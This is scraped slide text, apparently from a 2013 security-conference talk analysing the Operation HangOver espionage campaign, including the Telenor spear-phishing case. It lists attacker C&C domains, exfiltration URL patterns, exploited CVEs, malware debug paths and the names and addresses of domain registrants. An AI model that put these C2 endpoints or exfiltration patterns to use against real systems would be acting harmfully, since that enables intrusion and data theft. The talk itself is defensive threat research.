0 evaluări0% au considerat acest document util (0 voturi)
66 vizualizări67 pagini
Operation HangOver reveals a landscape of malware, actors, and development patterns. Telenor - Norwegian telco; 17 billion dollars - Went public with intrusion in March 2013. TL;DR Telenor intrusion Spear phishing email Self-extracting ZIP archive containing: - conhosts.exe and legal operations.doc Payload Minimally obfuscated VB binaries Connecting via HTTP port 80 to wreckmove.org.
Operation HangOver reveals a landscape of malware, actors, and development patterns. Telenor - Norwegian telco; 17 billion dollars - Went public with intrusion in March 2013. TL;DR Telenor intrusion Spear phishing email Self-extracting ZIP archive containing: - conhosts.exe and legal operations.doc Payload Minimally obfuscated VB binaries Connecting via HTTP port 80 to wreckmove.org.
Operation HangOver reveals a landscape of malware, actors, and development patterns. Telenor - Norwegian telco; 17 billion dollars - Went public with intrusion in March 2013. TL;DR Telenor intrusion Spear phishing email Self-extracting ZIP archive containing: - conhosts.exe and legal operations.doc Payload Minimally obfuscated VB binaries Connecting via HTTP port 80 to wreckmove.org.
Jonathan Camp About Me Norman Shark, offices in Oslo and San Diego American in Norway FTW!
Overview HangOver in 60 seconds And I care because? Intrusion Post-Publication OSX exploits in the wild Next Steps
Disclaimer: "None of the information contained in this presentation is intended to implicate any individual or entity or suggest inappropriate activity by any individual or entity mentioned" TL;DR Telenor Norwegian telco; 17 billion dollars Went public with intrusion in March 2013 spearfishing; known exploits; no stealth; no crypto Investigation by Norman Shark uncovered extensive landscape of malware, actors, and development patterns
Commoditization, Componentization and Outsourcing
Targeting government and the private sector Many indicators showing Indian origin TL;DR Surveillance Platform Industrial Espionage National Security Targets Why is this interesting? Scale
Lack of sophistication
Organizational aspects
Script-kiddies += scrum
Why does this even work? Telenor Intrusion Spear phishing email Self-extracting ZIP archive containing: conhosts.exe and legal operations.doc
Payload Minimally obfuscated VB binaries Connecting via HTTP port 80 to wreckmove.org
GET /flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts=[PLATFORM]
Observed C&C: wreckmove.org infocardiology.biz enlighten-energy.org researcherzone.net 151.237.188.167 gadgetscorner.org Telenor Epilogue Seemed like a pretty simple phishing case Then a second phishing email was seen:
http://mail.telenor.no- cookieauth.dll-getlogon-reason- 0.formdir-1-curl- z2fowaz2f.infocardiology.biz Telenor Epilogue Followed by:
An exact copy of toptenreviews.com And it was hosting a trojaned BitDefender installer Expansion Following the trail Strong behavioral indicators No anti-sandboxing tricks Hits in all major public DBs VirusTotal, malwr, TheatExpert
DNS URL Patterns VBScript signatures Now we have a pile of domain names Note: no DGA Most domains parked or dead But not all Open Directories! Treasure Trove Additional signed malware Keylogs Malware naming and embedded documents reveal potential targets
Exploits Exploits No 0-days Well-known vulnerabilities CVE-2012-0158 - MSCOMCTL.OCX CVE-2012-4792 IE 6-8 use-after-free CVE-2012-0422 Java get.adobe.flash.softmini.net Smackdown VisualBasic downloaders Similar methods (simple) of string obfuscation Smackdown D:\YASH\PRO\MY\DELIVERED\2012\DOWNLOADERS\c ompiled\NewSmack(sep2012)\miNaPro.vbp
Telenor case: C:\miNaPro.vbp HangOver aka Hanove Second stage malware C++ Recursively scan for office documents Upload via HTTP or FTP Commonish UserAgents Alternate names from debug paths: HangOver, Ron, Dragonball, Tourist, Klogger, FirstBlood and Babylon Targeting Targeting Sinkhole logs Strange domain names Social engineering attempts
Pakistan Two thirds of addresses in logs
GET /sdata/shopx.php?fol=EMBASSYOFPAKIST- Embassy%20of%20Pakistan
And many more China Industrial espionage Telenor Other possible targets: Eurasian Natural Resources Corporation Bumi PLC, Indonesia Porsche Informatik Chicago Mercantile Exchange Chicago Mercantile Exchange cmegroups.net spoofing cmegroup.com Same IP as other HangOver C&C Complaint filed with WIPO
The disputed domain name had been used by an imposter who has claimed to be the secretary of the Complainants president Terrence Duffy. Using the email address []@cmegroups.net the imposter has requested investment information on the pretext that it was sought by Mr. Duffy. Attribution Attribution 101:: Why? 1. Law enforcement stop the bad guys Most stringent burden of proof 2. Correlation expanded gathering of evidence Concerned with similarity of actors rather than who Attribution 101:: How? Strings can be faked DNS registrations is not authenticated Signed binaries certificates can be stolen Function signatures benign libraries URL/C&C patterns Copypasta and benign libraries OSI (open source intelligence) Not validated The problem with internet quotes is that you cant always depend on their accuracy Abraham Lincoln, 1864 strings FTW R:\payloads\ita nagar\Uploader\HangOver 1.5.7 (Startup)\HangOver 1.5.7 (Startup)\Release\Http_t.pdb C:\Users\neeru rana\Desktop\Klogger- 30 may\Klogger- 30 may\Release\Klogger.pdb C:\Users\Yash\Desktop\New folder\HangOver 1.5.7 (Startup) uploader\Release\Http_t.pdb
...May Payload\new keylogger\Flashdance1.0.2\... ...\Monthly Task\August 2011\USB Prop\... ...\Sept 2012\Keylogger\Release\... ...\June mac paylods\final Klogger-1 june-Fud from eset5.0\Klogger- 30 may\... ...\final project backup\complete task of ad downloader& usb grabber&uploader\... ...D:\YASH\PRO\MY\DELIVERED\2012\DOWNLOADERS\compiled\... strings FTW C:\BNaga\backup_28_09_2010\threads tut\pen-backup\BB_FUD_23\Copy of client\ Copy of client\appinbot_1.2_120308\Build\Win32\Release\appinclient.pdb C:\BNaga\kaam\Appin SOFWARES\RON 2.0.0\Release\Ron.pdb C:\BNaga\SCode\BOT\MATRIX_1.2.2.0\appinbot_1.2_120308\Build\Win32\Rele ase\deleter.pdb C:\Documents and Settings\Administrator\Desktop\Backup\17_8_2011\MATRIX_1.3.4\CLIENT\ Build\Win32\Release\appinclient.pdb D:\Projects\Elance\AppInSecurityGroup\FtpBackup\Release\Backup.pdb Domain Game Several hundred names Most with private registration Correlation muddied by sinkholes and parked domains Fingerprint open services (e.g. ESMTP)
Malicious Domains NITR0RAC3.COM, VALL3Y.COM, S3RV1C3S.NET, GAUZPIE.COM, BLUECREAMS.COM: Registrant: NA Prakash (mail@gmail.com) Jain TY-76, Kohat Enclave Delhi Delhi,110034 IN Tel. +011.9873456756
Domain Suspension PrivacyProtect.org provides private DNS registration
Privacy Fail PIEGAUZ.NET
Registrant: Appin Technologies Rakesh Gupta (rakesh.gupta@appinonline.com) 9th Floor, Metro Heights,NSP, PitamPura, Delhi Delhi,110034 IN Tel. +91.1147063300 Post-Publication Samples received by Norman Shark that attempt to contact a known HangOver domain OSX Exploitation and Attribution Oslo Freedom Forum May 16 th F-Secure reported new OS X spyware Mach-O universal (i386, x86_64) Contacted: securitytable.org and docsforum.info Both seen as part of previous HangOver research Apple Dev IDs Oslo malware was signed with an Apple Dev ID
Image via F-Secure URL Correlation 10 samples with identical Apple Dev IDs
securitytable.org/lang.php torqspot.org/App/MacADV/up.php?cname=%@&file=%@ docsforum.info/lang.php liveapple.eu/ADMac/up.php?cname=%@&file=%@&res=%@ URL Correlation Search VxDB for php?cname=file= URL Correlation Two different target OSes Different domains Same URL pattern Code Flow Disassembled a few OS X binaries 1. Search for *.doc, *.ppt, *.xls 2. Compress documents 3. POST to server 4. Ensure crontab entry 5. loop
Where now? Operation HangOver could have been prevented by the most basic of security precautions Closing questions & comments MAG2 saw it. Why didnt AV work? Signature definitions can lag by days or weeks
Step 1: assume users are dumb special Step 2: ?
Behavioral (dynamic) analysis is a mandatory component of any security infrastructure Special Thanks Snorre Fagerland & Morten Krkvik Norman Shark AMD Team For more information:
jonathan.camp@norman.com @NormanSec, @irondojo Black Hat 2013, Booth 321
Full Report: http://normanshark.com/hangoverreport/ Disclaimer: "None of the information contained in this presentation is intended to implicate any individual or entity or suggest inappropriate activity by any individual or entity mentioned"